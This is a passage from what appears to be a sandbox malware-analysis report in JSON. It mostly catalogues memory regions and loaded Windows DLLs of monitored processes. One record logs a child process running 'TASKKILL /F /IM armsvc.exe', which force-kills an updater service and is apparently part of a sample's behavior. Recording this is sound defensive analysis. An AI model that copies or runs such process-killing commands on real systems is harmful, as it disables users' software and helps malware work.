null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_1983", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:16.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1984", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:16.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1985", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:16.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1786970112, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_1986", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:16.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787363328, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_1987", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:16.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_1988", "name": "private_0x0000000001d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 30801920, "timestamp": "00:01:17.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 32767999, "entry_point": 0, "filename": null, "id": "region_1989", "name": "private_0x0000000001e40000", "norm_filename": null, "region_type": "private_memory", "start_va": 31719424, "timestamp": "00:01:17.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786773504, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_1990", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:17.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30408704, "type": "region", "version": 1 }, "end_va": 30670847, "entry_point": 0, "filename": null, "id": "region_1991", "name": "private_0x0000000001d00000", "norm_filename": null, "region_type": "private_memory", "start_va": 30408704, "timestamp": "00:01:17.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 35713023, "entry_point": 32768000, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1992", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32768000, "timestamp": "00:01:17.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36241408, "type": "region", "version": 1 }, "end_va": 36503551, "entry_point": 0, "filename": null, "id": "region_1993", "name": "private_0x0000000002290000", "norm_filename": null, "region_type": "private_memory", "start_va": 36241408, "timestamp": "00:01:17.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1994", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:17.342", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_1995", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:17.342", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_1996", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:17.343", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_1997", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:17.345", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30408703, "entry_point": 0, "filename": null, "id": "region_1998", "name": "private_0x0000000001cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30146560, "timestamp": "00:01:17.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31129600, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_1999", "name": "private_0x0000000001db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31129600, "timestamp": "00:01:17.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35717120, "type": "region", "version": 1 }, "end_va": 35979263, "entry_point": 0, "filename": null, "id": "region_2000", "name": "private_0x0000000002210000", "norm_filename": null, "region_type": "private_memory", "start_va": 35717120, "timestamp": "00:01:17.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37093376, "type": "region", "version": 1 }, "end_va": 37355519, "entry_point": 0, "filename": null, "id": "region_2001", "name": "private_0x0000000002360000", "norm_filename": null, "region_type": "private_memory", "start_va": 37093376, "timestamp": "00:01:17.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786707968, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_2002", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:17.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2003", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:17.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2004", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:17.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1785921536, "type": "region", "version": 1 }, "end_va": 1786019839, "entry_point": 1785921536, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_2005", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1785921536, "timestamp": "00:01:17.835", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1786052608, "type": "region", "version": 1 }, "end_va": 1786667007, "entry_point": 1786052608, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_2006", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1786052608, "timestamp": "00:01:17.842", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM armsvc.exe /IM armsvc.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_13", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 13, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2088", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:20.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2089", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:20.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2090", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:20.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2091", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:20.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2092", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:20.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_2093", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:20.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_2094", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:01:20.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 9134079, "entry_point": 9067657, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_2095", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 9043968, "timestamp": "00:01:20.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2096", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:20.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2097", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:20.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2098", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:20.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2099", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:20.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2100", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:20.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2101", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:20.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2102", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:20.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2103", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:20.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2104", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:20.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4784127, "entry_point": 0, "filename": null, "id": "region_2105", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:20.529", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2106", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:20.530", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2107", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:20.530", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2108", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:20.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_2109", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:20.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_2110", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:20.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2111", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:20.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2112", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:20.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1535999, "entry_point": 1114112, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2113", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1114112, "timestamp": "00:01:20.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_2114", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:20.559", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 7077887, "entry_point": 0, "filename": null, "id": "region_2115", "name": "private_0x00000000005c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6029312, "timestamp": "00:01:20.559", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_2116", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:20.559", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788628991, "entry_point": 1788416981, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_2117", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:20.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788735487, "entry_point": 1788678817, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_2118", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:20.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788739584, "type": "region", "version": 1 }, "end_va": 1788809215, "entry_point": 1788744448, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_2119", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788739584, "timestamp": "00:01:20.561", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1788870656, "type": "region", "version": 1 }, "end_va": 1788923903, "entry_point": 1788875232, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2120", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788870656, "timestamp": "00:01:20.561", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_2121", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:20.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_2122", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:20.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2123", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:20.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_2124", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", 